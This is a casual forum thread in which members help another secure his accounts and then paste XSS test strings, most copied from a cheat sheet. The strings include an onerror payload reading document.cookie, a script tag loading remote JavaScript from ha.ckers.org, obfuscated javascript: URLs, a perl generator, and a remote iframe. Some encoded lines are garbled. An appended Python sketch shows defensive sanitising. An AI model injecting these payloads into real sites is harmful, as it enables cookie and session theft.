If you have an ebay account i assume you have a paypal account too... don't forget to change that password too. And your myspace password.
He had his PayPal account's password different from the beginning.
Oh yeah... that's probably right... paypal doesn't allow weak crappy passwords like "puppies"
Finally trinoid changed his gmail passwords!
ya i did change both passwords and working on the rest
Yipeeeee!!
Well, so ends the adventures of Troll and Moonbat on their quest to help trinoid become security-savvy.
I hope it's the end :p
I'm bored, now what'll we do?
I'm bored too...
Brad- change all your passwords back
thank you very much
ok ok i think that im done nope i need to change one or two more but ty guys this has been fun and i hope that maybe we can be friends and not just you guys like attacking my site lol well ya ok im gunna go finish:D ill post back on this thread
Hmm, lemme test for some more xss vulnerabilities, other than the one mike found. If they work, a popup should come up
<img src='john.jpg' onerror='alert(document.cookie)'>
Here's one I found online
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
Another one from the same site
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<IMG SRC=javascript:alert("XSS")>
Yet again
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,8*,8*))>
Different encodings: should output alert(xss) or whatever
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=�*06�*7�**8�*7�**5�**�**4�*05�**2�**6:�*7�*08�*0*�**4�**6(�**X**�***>
<IMG SRC=j*v***r*pt&#x*A*lert('X**'*>
<IMG SRC="jav ascript:alert('XSS');">
Using perl thingy (all from the site)
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
<iframe src=http://ha.ckers.org/scriptlet.html>
what is that?
It can let you run JavaScript commands on a website as if they were coming from the server.
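Added example, not part of the thread or written by any poster: a Python sketch of the two checks a forum would need so that the strings tested above stay inert, which are output-encoding post bodies and an allowlist on URL schemes that normalises character references, tabs and NUL bytes before deciding. The names `is_safe_url`, `render_post` and `ALLOWED_SCHEMES` are hypothetical, and the allowlist of http/https is an assumption.

```python
import html
import re

# Assumption: the forum only permits web links and images.
ALLOWED_SCHEMES = {"http", "https"}

# Conservative normalisation: drop every control character and space,
# which is more than any browser strips, so "jav<TAB>ascript:" and
# "java<NUL>script:" collapse to "javascript:" before the check.
_IGNORED = re.compile(r"[\x00-\x20\x7f]")


def is_safe_url(raw: str) -> bool:
    """True if raw is a relative URL or uses an allowlisted scheme."""
    value = html.unescape(raw)  # &#106; and &#x09; become real characters
    value = _IGNORED.sub("", value).lower()
    # A scheme can only appear before the first "/", "?" or "#".
    head = re.split(r"[/?#]", value, maxsplit=1)[0]
    if ":" not in head:
        return True  # no scheme: relative path such as john.jpg
    return head.split(":", 1)[0] in ALLOWED_SCHEMES


def render_post(text: str) -> str:
    """Encode a post body for HTML output so markup is shown, not parsed."""
    return html.escape(text, quote=True)


if __name__ == "__main__":
    # Sample inputs: attribute values taken from the strings in this thread.
    samples = [
        "john.jpg",
        'javascript:alert("XSS")',
        "jav\tascript:alert('XSS');",
        'java\0script:alert("XSS")',
    ]
    for s in samples:
        print(repr(s), "->", "allow" if is_safe_url(s) else "reject")
    print(render_post("<img src='john.jpg' onerror='alert(document.cookie)'>"))
```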